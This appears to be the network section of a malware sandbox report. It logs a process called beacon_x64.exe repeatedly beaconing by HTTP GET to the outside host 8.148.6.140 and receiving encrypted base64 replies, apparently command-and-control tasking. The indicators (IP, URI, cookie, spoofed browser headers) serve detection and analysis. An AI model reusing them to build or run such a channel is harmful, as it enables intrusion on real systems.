Jan 10, 2025 09:28:08.798888922 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.6	50095	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:12.994018078 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.6	50096	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:14.015264034 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:14.994836092 CET	337	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:14 GMT Server: nginx Content-Length: 152 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 55 44 57 67 71 65 6e 6a 61 59 50 66 52 67 6c 44 44 6f 75 79 4b 32 53 6c 70 4d 4a 36 71 73 57 71 57 56 65 4b 59 6c 6c 76 6d 31 2b 42 35 46 78 59 39 43 53 32 51 52 43 4c 31 45 77 53 76 49 48 6f 5a 34 32 36 4c 74 31 43 72 78 4c 64 75 34 2b 35 5a 67 76 45 42 6d 77 6a 45 4c 50 43 4e 63 41 2b 67 63 36 4b 6a 44 42 61 6e 6f 54 59 34 6c 66 4b 63 33 32 50 4e 75 63 41 34 48 70 68 51 72 6c 2f 77 6a 62 6a 37 56 58 2f 33 61 5a 65 6d 4b 4d 2b 52 31 36 35 34 41 3d 3d Data Ascii: UDWgqenjaYPfRglDDouyK2SlpMJ6qsWqWVeKYllvm1+B5FxY9CS2QRCL1EwSvIHoZ426Lt1CrxLdu4+5ZgvEBmwjELPCNcA+gc6KjDBanoTY4lfKc32PNucA4HphQrl/wjbj7VX/3aZemKM+R1654A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.6	50097	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:15.108460903 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:19.111131907 CET	505	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:18 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 55 69 76 49 42 70 4d 64 67 63 6c 4f 59 33 71 4d 4c 55 42 4c 74 48 2f 4d 63 43 6d 30 67 78 72 52 79 5a 69 67 58 66 35 37 42 57 33 65 2b 44 65 30 63 76 4c 68 41 44 6b 4c 52 6f 4e 45 79 2f 73 62 56 34 33 57 6e 38 49 79 70 73 36 71 30 72 79 76 63 6e 6e 6f 52 51 41 4c 47 46 70 52 48 59 6f 55 30 65 74 64 4a 37 58 37 68 58 47 32 54 73 6c 77 2b 66 5a 2f 52 41 6c 53 7a 72 38 52 66 61 68 2f 35 74 69 63 64 72 50 74 31 43 4a 61 2b 43 74 32 58 34 4d 58 31 6e 4c 57 6c 38 42 78 72 48 6f 48 36 63 66 75 75 53 7a 6d 63 43 46 68 4d 63 4a 31 41 78 4a 44 53 43 32 64 68 48 57 34 2f 42 6c 6a 4e 6e 6b 35 76 61 46 6a 65 70 56 35 53 56 68 37 56 53 79 33 47 48 56 79 6e 70 5a 50 4d 39 49 41 35 64 33 4b 71 55 55 52 36 36 30 2f 30 2f 79 67 76 75 71 49 33 44 78 71 2f 68 62 66 34 63 59 6b 53 2b 71 74 47 50 42 39 42 48 68 45 36 30 32 58 4e 63 75 62 4b 6a 49 45 63 62 6b 50 58 74 52 6b 6a 66 6f 49 48 2f 4b 41 68 66 74 56 38 58 67 71 71 4a 64 56 76 44 45 35 75 37 63 6d 34 5a 49 4f Data Ascii: UivIBpMdgclOY3qMLUBLtH/McCm0gxrRyZigXf57BW3e+De0cvLhADkLRoNEy/sbV43Wn8Iyps6q0ryvcnnoRQALGFpRHYoU0etdJ7X7hXG2Tslw+fZ/RAlSzr8Rfah/5ticdrPt1CJa+Ct2X4MX1nLWl8BxrHoH6cfuuSzmcCFhMcJ1AxJDSC2dhHW4/BljNnk5vaFjepV5SVh7VSy3GHVynpZPM9IA5d3KqUUR660/0/ygvuqI3Dxq/hbf4cYkS+qtGPB9BHhE602XNcubKjIEcbkPXtRkjfoIH/KAhftV8XgqqJdVvDE5u7cm4ZIO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.6	50098	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:19.239536047 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.6	50099	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:20.218405962 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.6	50100	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:21.204240084 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:22.168569088 CET	529	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:22 GMT Server: nginx Content-Length: 344 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 56 31 50 61 6f 34 39 6d 2f 53 57 56 50 35 7a 6f 57 56 79 48 45 4b 54 76 61 75 57 30 6a 4f 6b 37 34 75 49 4f 32 6a 43 6f 77 37 42 57 38 58 37 36 61 46 6e 38 61 4f 49 6a 76 48 36 67 46 72 67 51 4f 6f 41 73 34 34 37 43 71 66 39 74 41 63 68 4e 4c 5a 78 61 4c 4f 6d 2f 70 4a 34 58 35 55 65 65 55 7a 79 69 74 77 68 57 5a 59 54 6f 4d 32 4f 54 70 53 44 39 58 72 70 72 47 74 70 48 6a 47 76 67 4a 33 48 6e 45 47 5a 36 44 69 50 6d 6a 79 77 4d 45 4c 35 49 41 55 61 64 39 51 31 6d 34 36 45 58 38 5a 53 36 33 42 47 72 48 39 35 36 50 55 71 72 53 41 63 63 4c 73 74 37 33 6a 69 54 79 52 59 2b 35 38 70 6c 49 4a 61 31 54 39 61 6f 69 76 42 59 67 4e 78 61 62 39 34 47 42 4e 43 57 51 37 61 56 58 74 6c 38 41 2f 35 49 62 48 61 56 61 39 61 35 4c 63 51 43 53 76 55 44 7a 67 55 77 2f 48 44 48 64 4a 30 2f 37 6a 51 4f 73 35 46 4d 53 2b 75 71 70 74 6d 61 42 43 69 75 4f 55 41 4e 2b 32 68 72 6d 50 72 71 34 4f 56 78 71 79 6d 74 51 4e 34 63 76 4f 66 4e 2b 47 63 53 74 69 4b 55 48 4d 6a 4c 48 4a 6a 77 34 33 46 36 63 4d 2f 42 49 56 4c 65 77 34 [TRUNCATED] Data Ascii: V1Pao49m/SWVP5zoWVyHEKTvauW0jOk74uIO2jCow7BW8X76aFn8aOIjvH6gFrgQOoAs447Cqf9tAchNLZxaLOm/pJ4X5UeeUzyitwhWZYToM2OTpSD9XrprGtpHjGvgJ3HnEGZ6DiPmjywMEL5IAUad9Q1m46EX8ZS63BGrH956PUqrSAccLst73jiTyRY+58plIJa1T9aoivBYgNxab94GBNCWQ7aVXtl8A/5IbHaVa9a5LcQCSvUDzgUw/HDHdJ0/7jQOs5FMS+uqptmaBCiuOUAN+2hrmPrq4OVxqymtQN4cvOfN+GcStiKUHMjLHJjw43F6cM/BIVLew4q6iw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.6	50101	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:22.281198978 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:23.276449919 CET	184	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:23 GMT Server: nginx Content-Length: 88 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:28:23.276518106 CET	88	IN	Data Raw: 4d 69 36 7a 4d 35 30 50 4b 55 49 31 63 63 2b 63 64 35 69 64 75 72 68 46 50 32 4b 55 64 6b 31 6d 57 53 53 45 6e 66 41 49 61 65 55 30 6b 48 72 52 37 70 55 66 4c 54 51 4f 4a 50 4f 2f 75 72 38 56 52 63 48 4a 70 64 74 2f 34 43 5a 62 49 42 6f 4e 6f 32 Data Ascii: Mi6zM50PKUI1cc+cd5idurhFP2KUdk1mWSSEnfAIaeU0kHrR7pUfLTQOJPO/ur8VRcHJpdt/4CZbIBoNo2Br+A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.6	50102	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:23.392055035 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.6	50103	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:24.365695953 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.6	50104	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:25.373895884 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.6	50106	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:26.421905041 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:27.488518000 CET	529	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:27 GMT Server: nginx Content-Length: 344 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 49 4f 54 48 38 30 5a 50 73 41 6e 79 61 50 4c 31 5a 67 48 54 57 73 48 36 2f 7a 61 35 63 62 52 47 54 48 2b 6a 71 6d 79 56 42 2b 4f 6a 61 6c 54 32 70 50 63 6d 63 33 6e 7a 63 71 73 70 70 32 48 59 41 72 48 34 4d 70 79 53 5a 47 43 48 31 57 4e 48 4d 5a 37 6b 65 39 47 67 2b 45 30 66 42 66 45 4f 35 5a 56 2b 6b 36 78 57 2f 6f 53 6a 61 45 48 51 4b 4a 2f 2f 37 73 79 43 79 76 52 34 44 69 69 38 68 51 65 62 45 57 31 6c 48 49 6c 4e 46 4d 39 42 78 6e 75 52 57 51 78 2f 42 6b 64 46 50 4d 50 4e 52 74 4c 75 34 49 42 65 34 6e 54 4f 55 57 36 58 51 56 33 6a 64 63 77 74 36 69 51 69 46 2f 77 67 71 46 6b 43 70 64 68 65 42 42 46 42 46 75 39 52 6e 68 63 46 6d 59 44 65 32 44 77 37 31 58 64 4a 56 57 36 61 53 31 78 64 31 45 50 58 70 47 35 63 67 77 50 4c 57 63 6d 32 50 39 35 43 39 4b 38 2f 32 68 6a 4a 72 30 50 54 50 71 4b 68 61 34 71 34 2f 46 34 33 43 56 4d 38 74 48 54 33 70 6e 76 39 52 35 4a 41 42 31 34 37 37 6a 42 2b 42 31 70 64 42 6b 4d 77 70 72 44 76 58 57 77 43 65 77 44 74 53 5a 56 6d 64 2f 6c 6b 33 63 4c 44 66 45 30 56 55 55 [TRUNCATED] Data Ascii: IOTH80ZPsAnyaPL1ZgHTWsH6/za5cbRGTH+jqmyVB+OjalT2pPcmc3nzcqspp2HYArH4MpySZGCH1WNHMZ7ke9Gg+E0fBfEO5ZV+k6xW/oSjaEHQKJ//7syCyvR4Dii8hQebEW1lHIlNFM9BxnuRWQx/BkdFPMPNRtLu4IBe4nTOUW6XQV3jdcwt6iQiF/wgqFkCpdheBBFBFu9RnhcFmYDe2Dw71XdJVW6aS1xd1EPXpG5cgwPLWcm2P95C9K8/2hjJr0PTPqKha4q4/F43CVM8tHT3pnv9R5JAB1477jB+B1pdBkMwprDvXWwCewDtSZVmd/lk3cLDfE0VUURY/A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.6	50107	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:27.611368895 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.6	50108	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:28.570034027 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:32.563205957 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:32 GMT Server: nginx Content-Length: 300 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:28:32.563323975 CET	300	IN	Data Raw: 4f 70 75 55 67 36 48 30 75 33 4f 76 5a 47 71 79 31 73 6c 47 65 68 2b 75 63 5a 4e 38 31 59 56 5a 73 4b 6e 4f 6a 4f 68 57 54 56 58 7a 74 47 69 51 41 37 55 75 4b 70 4c 35 79 59 4d 43 2f 4c 7a 34 5a 50 51 41 78 5a 55 62 32 52 6c 79 35 58 4f 61 62 56 Data Ascii: OpuUg6H0u3OvZGqy1slGeh+ucZN81YVZsKnOjOhWTVXztGiQA7UuKpL5yYMC/Lz4ZPQAxZUb2Rly5XOabV6pdrk+y9gxJUTQEwCtAbcjhUKU4siizbDqACVB0v1JJezwMW2z9cfdsHHO+7OSFKE2lziTg/DnhyWlxppRNS7lTWIqrF92yQbUCncQqYHwayTDPi1YO7N9xelXzMwNkwM1IvTui2etis0aFRoiDAONaiYpO3lKy9e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.6	50109	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:32.688064098 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.6	50110	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:33.671336889 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.6	50111	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:34.797946930 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:35.782660961 CET	529	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:35 GMT Server: nginx Content-Length: 344 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 67 46 46 62 45 52 34 6b 33 59 46 74 5a 59 65 36 36 4f 7a 6d 6f 78 70 38 73 4c 6b 56 46 66 6d 47 57 2b 78 37 6e 49 76 32 6a 2f 2f 39 35 4e 4c 49 55 65 4e 34 4a 69 38 49 62 31 44 39 4d 4c 72 49 56 68 47 56 51 77 70 6e 32 67 31 52 31 6b 42 76 78 47 41 78 51 51 5a 53 6f 75 35 50 4d 41 62 2b 31 70 49 79 49 77 56 39 76 33 64 50 76 72 56 42 35 42 4e 5a 6d 6e 4c 55 42 6d 67 61 4d 6d 46 42 75 6b 36 63 76 75 78 55 47 4c 36 47 30 6c 74 61 32 5a 39 6d 33 52 30 44 33 56 77 41 4d 48 58 44 38 59 6c 42 36 42 70 36 67 79 73 36 72 4e 6a 73 32 71 4c 70 78 4e 6f 70 71 7a 38 56 6b 7a 44 6f 62 43 42 55 57 70 58 4c 69 62 45 6a 72 47 4f 59 4b 52 71 38 66 50 79 61 36 39 35 61 61 75 45 78 6c 6d 46 4a 36 72 63 2f 4e 55 6e 32 38 64 38 2f 34 54 51 66 4b 33 61 46 61 66 35 63 4c 77 32 67 39 51 2f 66 66 4c 30 50 35 6c 66 61 69 50 5a 38 4f 37 4d 50 6e 65 45 73 66 57 71 56 64 30 6c 4c 42 58 61 69 68 4b 4f 61 51 32 75 6a 58 72 79 45 39 6c 75 35 31 31 6b 62 35 6c 56 58 38 37 55 41 56 42 36 65 32 6a 55 62 37 4b 2b 58 41 32 71 70 47 69 [TRUNCATED] Data Ascii: 